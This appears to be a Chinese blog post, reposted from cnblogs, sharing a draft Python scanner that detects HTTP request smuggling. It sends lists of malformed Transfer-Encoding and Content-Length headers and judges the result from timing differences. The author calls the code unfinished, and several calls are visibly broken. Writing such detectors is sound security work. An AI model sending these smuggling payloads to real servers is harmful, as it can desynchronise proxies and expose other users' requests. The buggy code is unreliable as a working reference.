http-smuggling
作者:互联网
前言
本来想写成获取参数,启动nmap扫描端口,对所有得到HTTP端口进行测试。后来偷懒写成pocsuite3的插件了。
项目地址
原理与攻击面
协议层的攻击——HTTP请求走私
一篇文章带你读懂http请求走私
seebug这篇中提到的几篇blackhat议题建议都看看
检测脚本-草稿
freebuf上的一篇检测脚本实现
nmap扫描端口,识别http服务还没写完
命令行运行,接受参数部分也没写完
# -*- coding:utf-8 -*-
from libnmap import process
from libnmap import parser
import requests
import time
import urllib3
import http
import argparse
import collections
http.client._is_legal_header_name = lambda x: True
http.client._is_illegal_header_value = lambda x: False
urllib3.disable_warnings()
def get_opt():
usage = "-u <a target url>\n -n <target network segment>\n -f <targets url file>\n -s <enable multiprocess>\n"
opt_parser = argparse.ArgumentParser(usage=usage, epilog="written by wuerror")
opt_parser.add_argument('-u', type=str, nargs='?', dest='url', help="imput a single target url")
opt_parser.add_argument('-s', action="store_ture", dest='sig', help="a signal for start multiprocess")
args = opt_parser.parse_args()
return args
def nmap_scan(target):
nmap_proc = process.NmapProcess(target, options="-sV")
nmap_proc.run_background()
while nmap_proc.is_running():
print("Nmap Scan running: ETC: {0} DONE: {1}%".format(nmap_proc.etc,nmap_proc.progress))
time.sleep(2)
if(nmap_proc.rc == 0):
parsed = parser.NmapParser.parse(nmap_proc.stdout)
for host in parsed.hosts:
print(host)
print(host.services)
for serv in host.services:
if serv.service == "http" or serv.service == "https":
pass
class Smuggler():
"""
the main function class
"""
def __init__(self):
# 用于人工复核
self.recheck_headers = None
self.payload_headers = []
# malformed te headers
self.te_headers = []
self.Transfer_Encoding = [["Transfer-Encoding", "chunked"],
["Transfer-Encoding ", "chunked"],
["Transfer_Encoding", "chunked"],
["Transfer Encoding", "chunked"],
[" Transfer-Encoding", "chunked"],
["Transfer-Encoding", " chunked"],
["Transfer-Encoding", "chunked"],
["Transfer-Encoding", "\tchunked"],
["Transfer-Encoding", "\u000Bchunked"],
["Content-Encoding", " chunked"],
["Transfer-Encoding", "\n chunked"],
["Transfer-Encoding\n ", " chunked"],
["Transfer-Encoding", " \"chunked\""],
["Transfer-Encoding", " 'chunked'"],
["Transfer-Encoding", " \n\u000Bchunked"],
["Transfer-Encoding", " \n\tchunked"],
["Transfer-Encoding", " chunked, cow"],
["Transfer-Encoding", " cow, "],
["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
["Transfer-Encoding", " chunk"],
["Transfer-Encoding", " cHuNkeD"],
["TrAnSFer-EnCODinG", " cHuNkeD"],
["Transfer-Encoding", " CHUNKED"],
["TRANSFER-ENCODING", " CHUNKED"],
["Transfer-Encoding", " chunked\r"],
["Transfer-Encoding", " chunked\t"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer\r-Encoding", " chunked"],
["barn\n\nTransfer-Encoding", " chunked"],
]
def malform(self):
"""
制作畸形transfer-encoding头
"""
self.te_headers = self.Transfer_Encoding
for x in self.Transfer_Encoding:
if " " == x[1][0]:
for i in [9, 11, 12, 13]:
# print (type(chr(i)))
c = str(chr(i))
self.te_headers.append([x[0], c + x[1][1:]])
def make_headers(self):
"""
为每一个Transfer-encoding头添加其他header值
"""
for x in self.te_headers:
headers = collections.OrderedDict()
headers[x[0]] = x[1]
headers['Cache-Control'] = "no-cache"
headers['Content-Type'] = "application/x-www-form-urlencoded"
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
self.payload_headers.append(headers)
def send_payload(self, url, headers={}, payload=""):
"""
通过requests预处理来发送检测http报文
:param url:检测目标url
:param headers:HTTP头部
:param payload:HTTP body
:return resp_time:响应报文的时延
"""
s = requests.Session()
req = requests.Request('POST', url, data=payload)
prepped = req.prepare()
prepped.headers = headers
resp_time = 0
try:
resp = s.send(prepped, verify=False, timeout=10)
resp_time = resp.elapsed.total_seconds()
except requests.exceptions.ReadTimeout as e:
print(e.args)
resp_time = 10
except requests.exceptions.ConnectionError as ex:
print(ex.args)
print("failed to connect")
return None
return resp_time
def check_clte(self, url):
"""
检测CL-TE类型走私漏洞
"""
payloads = self.payload_headers
for headers in payloads:
headers['Content-Length'] = 4
payload = "1\r\nZ\r\nQ\r\n\r\n\r\n"
t2 = self.send_payload(headers, payload)
if t2 is None:
t2 = 0
if t2 < 5:
continue
#正常报文
headers['Content-Length'] = 11
payload = "1\r\nZ\r\nQ\r\n\r\n\r\n"
t1 = self.send_payload(url, headers, payload)
if t1 is None:
t1 = 1
print(t1, t2)
if t2 > 5 and t2 / t1 >= 5:
self.recheck_headers = [headers]
#record a log
return True
return False
def check_tecl(self, url):
"""
检测TE-CL类型走私漏洞
"""
payloads = self.payload_headers
for headers in payloads:
payload = "0\r\n\r\nX"
headers['Content-Length'] = 6
t2 = self.send_payload(headers, payload)
if t2 is None:
t2 = 0
if t2 < 5:
continue
payload = "0\r\n\r\n"
headers['Content-Length'] = 5
t1 = self.send_payload(headers, payload)
if t1 is None:
t1 = 1
if t2 is None:
t2 = 0
if t2 > 5 and t2 / t1 >= 5:
self.recheck_headers = [headers]
#record a log
return True
return False
def send_cl_payload(self, url, header, payload):
"""
发送CL-CL类型检测报文
"""
sess = requests.Session()
req = requests.Request('POST', url, data=payload)
prepped = req.prepare()
prepped.headers = header
try:
resp = sess.send(prepped, verify=False, timeout=10)
if(resp.status_code == 400):
return False
else:
return True
except Exception as e:
print(e.args)
return False
def check_clcl(self, url):
"""
检测CL-CL类型漏洞
RFC 7230 section 3.3.3
"""
length = ["Content-Length", " 8\r\nContent-Length: 5"]
clh = []
cl_payload = []
if " " == length[1][0]:
# ascill of HT,VT,FF,CR
for i in [9, 11, 12, 13]:
c = str(chr(i))
clh.append([length[0], c + length[1][1:]])
for cl in clh:
cl_header = collections.OrderedDict()
cl_header[cl[0]] = cl[1]
cl_header["Cache-Control"] = "no-cache"
cl_header['Content-Type'] = "application/x-www-form-urlencoded"
cl_header['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
cl_payload.append(cl_header)
for head in cl_payload:
flag = self.send_cl_payload(url, head, "0\r\n\r\n")
if flag is True:
print("clcl detect")
def run(self, url):
"""
entrance
"""
try:
if self.check_clte(url):
print("vuln detect: CL-TE")
elif self.check_tecl(url):
print("vuln detect:TE-CL")
elif self.check_clcl(url):
print("vuln detect:CL-CL")
else:
print("not detect")
except Exception as e:
print(e.args)
if __name__ == "__main__":
smug = Smuggler()
smug.malform()
smug.make_headers()
url = ''
smug.run(url)
最后
我感觉这漏洞想利用也蛮难的,不是一个exp就能搞定的
标签:http,Encoding,Transfer,smuggling,payload,headers,chunked,self 来源: https://www.cnblogs.com/wuerror/p/14508875.html